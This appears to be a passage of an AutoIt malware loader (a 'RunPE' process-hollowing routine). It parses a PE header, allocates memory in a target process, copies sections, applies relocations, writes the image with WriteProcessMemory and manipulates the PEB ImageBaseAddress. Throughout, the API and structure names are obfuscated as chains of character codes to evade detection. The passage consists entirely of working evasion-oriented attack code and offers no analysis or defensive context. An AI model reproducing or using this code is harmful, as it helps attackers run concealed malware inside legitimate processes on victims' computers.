			GetChr(59) & $2 & GetChr(32) & GetChr(77) & GetChr(97) & GetChr(106) & GetChr(111) & GetChr(114) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & $2 & GetChr(32) & GetChr(77) & _
			GetChr(105) & GetChr(110) & GetChr(111) & GetChr(114) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59) & $1 & GetChr(32) & GetChr(87) & GetChr(105) & GetChr(110) & GetChr(51) & GetChr(50) & GetChr(86) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(86) & GetChr(97) & GetChr(108) & GetChr(117) & GetChr(101) & _
			GetChr(59) & $1 & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(59) & $1 & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(59)
	Local $opt9 = $1 & GetChr(32) & GetChr(67) & GetChr(104) & GetChr(101) & GetChr(99) & GetChr(107) & GetChr(83) & GetChr(117) & GetChr(109) & GetChr(59) & $2 & GetChr(32) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(115) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(59) & $2 & _
			GetChr(32) & GetChr(68) & GetChr(108) & GetChr(108) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(97) & GetChr(99) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(115) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(99) & GetChr(107) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(59) & _
			GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(99) & GetChr(107) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(59)
	Local $opt10 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(59) & $1 & GetChr(32) & GetChr(76) & GetChr(111) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & _
			GetChr(59) & $1 & GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(82) & GetChr(118) & GetChr(97) & GetChr(65) & GetChr(110) & GetChr(100) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(115)
	$opthead = sv1($opt1 & $opt2 & $opt3 & $opt4 & $opt5 & $opt6 & $opt7 & $opt8 & $opt9 & $opt10, $ptr)
	$ptr += 112
Else
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
EndIf
Local $entry = sv2($opthead, GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(79) & GetChr(102) & GetChr(69) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(121) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116))
Local $newsoh = sv2($opthead, GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(115))
Local $newhib = sv2($opthead, GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101))
Local $newsoi = sv2($opthead, GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101))
$ptr += 40
Local $reloc2 = sv1(GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101), $ptr)
Local $reloc = sv2($reloc2, GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115))
Local $relocsize = sv2($reloc2, GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101))
Local $reloctable
If $reloc And $relocsize Then $reloctable = True
$ptr += 88

#Region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $Relocate
Local $ZP
If $reloctable Then
	$ZP = sv5($handle1, $newsoi)
	If @error Then
		$ZP = sv6($handle1, $newhib, $newsoi)
		If @error Then
			sv7($handle1, $newhib)
			$ZP = sv6($handle1, $newhib, $newsoi)
			If @error Then
				sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
			EndIf
		EndIf
	EndIf
	$Relocate = True
Else
	$ZP = sv6($handle1, $newhib, $newsoi)
	If @error Then
		sv7($handle1, $newhib)
		$ZP = sv6($handle1, $newhib, $newsoi)
		If @error Then
			sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
			Return SetError(101, 0, 0)
		EndIf
	EndIf
EndIf
DllStructSetData($opthead, GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101), $ZP)

#Region 7. CONSTRUCT THE NEW MODULE
Local $tMod = sv1($byt & $newsoi & GetChr(93))
Local $pMod = DllStructGetPtr($tMod)
Local $tHead = sv1($byt & $newsoh & GetChr(93), $newheader)
DllStructSetData($tMod, 1, sv2($tHead, 1))
Local $tISH
Local $iSORD, $pPTRD
Local $iVA, $iVZ
Local $tRR
For $i = 1 To $numsecs
	Local $num1 = GetChr(99) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(32) & GetChr(78) & GetChr(97) & GetChr(109) & GetChr(101) & GetChr(91) & GetChr(56) & GetChr(93) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(85) & GetChr(110) & GetChr(105)
	Local $num2 = GetChr(111) & GetChr(110) & GetChr(79) & GetChr(102) & GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(65) & GetChr(110) & GetChr(100) & GetChr(80) & GetChr(104) & GetChr(121) & GetChr(115) & GetChr(105)
	Local $num3 = GetChr(99) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116)
	Local $num4 = GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102)
	Local $num5 = GetChr(82) & GetChr(97) & GetChr(119) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(84) & GetChr(111) & GetChr(82) & GetChr(97) & GetChr(119) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
	Local $num6 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(84) & GetChr(111) & GetChr(82) & GetChr(101) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(111)
	Local $num7 = GetChr(110) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(84) & GetChr(111)
	Local $num8 = GetChr(76) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(110) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(82)
	Local $num9 = GetChr(101) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(115) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(78) & GetChr(117)
	Local $num10 = GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(76) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(110) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(59)
	Local $num11 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(97) & GetChr(99) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(115)
	$tISH = sv1($num1 & $num2 & $num3 & $num4 & $num5 & _
			$num6 & $num7 & $num8 & $num9 & $num10 & $num11, $ptr)
	$iSORD = sv2($tISH, GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(79) & GetChr(102) & GetChr(82) & GetChr(97) & GetChr(119) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97))
	$pPTRD = $newheader + sv2($tISH, GetChr(80) & GetChr(111) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(84) & GetChr(111) & GetChr(82) & GetChr(97) & GetChr(119) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97))
	$iVA = sv2($tISH, GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115))
	$iVZ = sv2($tISH, GetChr(85) & GetChr(110) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(79) & GetChr(102) & GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(65) & GetChr(110) & GetChr(100) & GetChr(80) & GetChr(104) & GetChr(121) & GetChr(115) & GetChr(105) & GetChr(99) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115))
	If $iVZ And $iVZ < $iSORD Then $iSORD = $iVZ
	If $iSORD Then
		DllStructSetData(sv1($byt & $iSORD & GetChr(93), $pMod + $iVA), 1, sv2(sv1($byt & $iSORD & GetChr(93), $pPTRD), 1))
	EndIf
	If $Relocate Then
		If $iVA <= $reloc And $iVA + $iSORD > $reloc Then
			$tRR = sv1($byt & $relocsize & GetChr(93), $pPTRD + ($reloc - $iVA))
		EndIf
	EndIf
	$ptr += 40
Next
If $Relocate Then sv8($pMod, $tRR, $ZP, $newhib, $magic = 523)
Local $5 = sv3($knl, $bo, $wpm, $ha, $handle1, $p2r, $ZP, $p2r, $pMod, GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114), $newsoi, GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(95) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(42), 0)
If @error Or Not $5[0] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	Return SetError(7, 0, 0)
EndIf

#Region 8. PEB ImageBaseAddress MANIPULATION
Local $tPEBl1var1 = GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(73) & GetChr(110) & GetChr(104) & GetChr(101) & GetChr(114) & GetChr(105) & GetChr(116) & GetChr(101) & GetChr(100) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(83) & GetChr(112) & GetChr(97) & GetChr(99) & GetChr(101) & GetChr(59)
Local $tPEBl1var2 = GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(70) & GetChr(105) & GetChr(108) & GetChr(101) & GetChr(69) & GetChr(120) & GetChr(101) & GetChr(99) & GetChr(79) & GetChr(112) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(115) & GetChr(59)
Local $tPEBl1var3 = GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(66) & GetChr(101) & GetChr(105) & GetChr(110) & GetChr(103) & GetChr(68) & GetChr(101) & GetChr(98) & GetChr(117) & GetChr(103) & GetChr(103) & GetChr(101) & GetChr(100) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(83) & GetChr(112) & GetChr(97) & GetChr(114) & GetChr(101) & GetChr(59)
Local $tPEBl1var4 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(77) & GetChr(117) & GetChr(116) & GetChr(97) & GetChr(110) & GetChr(116) & GetChr(59)
Local $tPEBl1var5 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(73) & GetChr(109) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(65) & GetChr(100) & GetChr(100) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59)
Local $tPEBl1var6 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(76) & GetChr(111) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl1var7 = $tPEBl1var3 & $tPEBl1var4 & $tPEBl1var5
Local $tPEBl1var8 = GetChr(32) & GetChr(69) & GetChr(110) & GetChr(118) & GetChr(105) & GetChr(114) & GetChr(111) & GetChr(110) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(85) & GetChr(112) & GetChr(100) & GetChr(97) & GetChr(116) & GetChr(101) & GetChr(67) & GetChr(111) & GetChr(117) & GetChr(110) & GetChr(116) & GetChr(59)
Local $tPEBl1 = $tPEBl1var1 & _
		$tPEBl1var2 & $tPEBl1var7 & $tPEBl1var6
Local $tPEBl2var1 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(80) & GetChr(97) & GetChr(114) & GetChr(97) & GetChr(109) & GetChr(101) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(115) & GetChr(59)
Local $tPEBl2var2 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(83) & GetChr(117) & GetChr(98) & GetChr(83) & GetChr(121) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(109) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl2var3 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(59)
Local $tPEBl2var4 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(70) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(80) & GetChr(101) & GetChr(98) & GetChr(76) & GetChr(111) & GetChr(99) & GetChr(107) & GetChr(59)
Local $tPEBl2var5 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(70) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(80) & GetChr(101) & GetChr(98) & GetChr(76) & GetChr(111) & GetChr(99) & GetChr(107) & GetChr(82) & GetChr(111) & GetChr(117) & GetChr(116) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(59)
Local $tPEBl2var6 = $tPEBl2var1 & $tPEBl2var2 & $tPEBl2var3 & $tPEBl2var4
Local $tPEBl2var7 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(70) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(80) & GetChr(101) & GetChr(98) & GetChr(85) & GetChr(110) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(107) & GetChr(82) & GetChr(111) & GetChr(117) & GetChr(116) & GetChr(105) & GetChr(110) & GetChr(101) & GetChr(59)
Local $tPEBl2var8 = $tPEBl2var7 & $1 & $tPEBl1var8
Local $tPEBl2 = $tPEBl2var6 & $tPEBl2var5 & $tPEBl2var8
Local $tPEBl3var1var1 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(75) & GetChr(101) & GetChr(114) & GetChr(110) & GetChr(101) & GetChr(108) & GetChr(67) & GetChr(97) & GetChr(108) & GetChr(108) & GetChr(98) & GetChr(97) & GetChr(99) & GetChr(107) & GetChr(84) & GetChr(97) & GetChr(98) & GetChr(108) & GetChr(101) & GetChr(59)
Local $tPEBl3var1var2 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(69) & GetChr(118) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(76) & GetChr(111) & GetChr(103) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(59)
Local $tPEBl3var1var3 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(69) & GetChr(118) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(76) & GetChr(111) & GetChr(103) & GetChr(59)
Local $tPEBl3var1var4 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(70) & GetChr(114) & GetChr(101) & GetChr(101) & GetChr(76) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(59)
Local $tPEBl3var1 = $tPEBl3var1var1 & $tPEBl3var1var2 & $tPEBl3var1var3 & $tPEBl3var1var4
Local $tPEBl3var2 = GetChr(32) & GetChr(84) & GetChr(108) & GetChr(115) & GetChr(69) & GetChr(120) & GetChr(112) & GetChr(97) & GetChr(110) & GetChr(115) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(67) & GetChr(111) & GetChr(117) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(84) & GetChr(108) & GetChr(115) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(109) & GetChr(97) & GetChr(112) & GetChr(59)
Local $tPEBl3var3 = GetChr(32) & GetChr(84) & GetChr(108) & GetChr(115) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(109) & GetChr(97) & GetChr(112) & GetChr(66) & GetChr(105) & GetChr(116) & GetChr(115) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(79) & GetChr(110) & GetChr(108) & GetChr(121) & GetChr(83) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(101) & GetChr(100) & GetChr(77) & GetChr(101) & GetChr(109) & GetChr(111) & GetChr(114) & GetChr(121) & GetChr(66) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(59)
Local $tPEBl3 = $tPEBl3var1 & $1 & $tPEBl3var2 & $1 & $tPEBl3var3
Local $tPEBl4var1var1 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(79) & GetChr(110) & GetChr(108) & GetChr(121) & GetChr(83) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(101) & GetChr(100) & GetChr(77) & GetChr(101) & GetChr(109) & GetChr(111) & GetChr(114) & GetChr(121) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(59)
Local $tPEBl4var1var2 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(79) & GetChr(110) & GetChr(108) & GetChr(121) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(83) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(114) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl4var1var3 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(65) & GetChr(110) & GetChr(115) & GetChr(105) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(80) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl4var1var4 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(79) & GetChr(101) & GetChr(109) & GetChr(67) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(80) & GetChr(97) & GetChr(103) & GetChr(101) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl4var1var5 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(85) & GetChr(110) & GetChr(105) & GetChr(99) & GetChr(111) & GetChr(100) & GetChr(101) & GetChr(67) & GetChr(97) & GetChr(115) & GetChr(101) & GetChr(84) & GetChr(97) & GetChr(98) & GetChr(108) & GetChr(101) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(59)
Local $tPEBl4var1var6 = $tPEBl4var1var3 & $tPEBl4var1var4 & $tPEBl4var1var5
Local $tPEBl4var1var7 = $tPEBl4var1var2 & $tPEBl4var1var6
Local $tPEBl4var1var8 = $tPEBl4var1var1 & $tPEBl4var1var7
Local $tPEBl4var1 = $tPEBl4var1var8
Local $tPEBl4var2 = GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(111) & GetChr(114) & GetChr(115) & GetChr(59)
Local $tPEBl4 = $tPEBl4var1 & $1 & $tPEBl4var2
Local $tPEBl5var1var1 = GetChr(32) & GetChr(78) & GetChr(116) & GetChr(71) & GetChr(108) & GetChr(111) & GetChr(98) & GetChr(97) & GetChr(108) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(59) & GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(32) & GetChr(83) & GetChr(112) & GetChr(97) & GetChr(114) & GetChr(101) & GetChr(50) & GetChr(91) & GetChr(52) & GetChr(93) & GetChr(59)
Local $tPEBl5var1var2 = GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(67) & GetChr(114) & GetChr(105) & GetChr(116) & GetChr(105) & GetChr(99) & GetChr(97) & GetChr(108) & GetChr(83) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(84) & GetChr(105) & GetChr(109) & GetChr(101) & GetChr(111) & GetChr(117) & GetChr(116) & GetChr(59)
Local $tPEBl5var1 = $tPEBl5var1var1 & $tPEBl5var1var2
Local $tPEBl5var2 = GetChr(32) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(59)
Local $tPEBl5var3 = GetChr(32) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(109) & GetChr(101) & GetChr(110) & GetChr(116) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(59)
Local $tPEBl5var4 = GetChr(32) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(68) & GetChr(101) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(84) & GetChr(111) & GetChr(116) & GetChr(97) & GetChr(108) & GetChr(70) & GetChr(114) & GetChr(101) & GetChr(101) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(104) & GetChr(111) & GetChr(108) & GetChr(100) & GetChr(59)
Local $tPEBl5var5 = $1 & $tPEBl5var1 & $1 & $tPEBl5var2 & $1
Local $tPEBl5var6 = $tPEBl5var5 & $tPEBl5var3 & $1
Local $tPEBl5 = $tPEBl5var6 & $tPEBl5var4
Local $tPEBl6var1 = GetChr(32) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(68) & GetChr(101) & GetChr(67) & GetChr(111) & GetChr(109) & GetChr(109) & GetChr(105) & GetChr(116) & GetChr(70) & GetChr(114) & GetChr(101) & GetChr(101) & GetChr(66) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(107) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(115) & GetChr(104) & GetChr(111) & GetChr(108) & GetChr(100) & GetChr(59)
Local $tPEBl6var2 = GetChr(32) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(115) & GetChr(59)
Local $tPEBl6var3 = GetChr(32) & GetChr(77) & GetChr(97) & GetChr(120) & GetChr(105) & GetChr(109) & GetChr(117) & GetChr(109) & GetChr(78) & GetChr(117) & GetChr(109) & GetChr(98) & GetChr(101) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(115) & GetChr(59)
Local $tPEBl6var4 = GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(112) & GetChr(115) & GetChr(59)
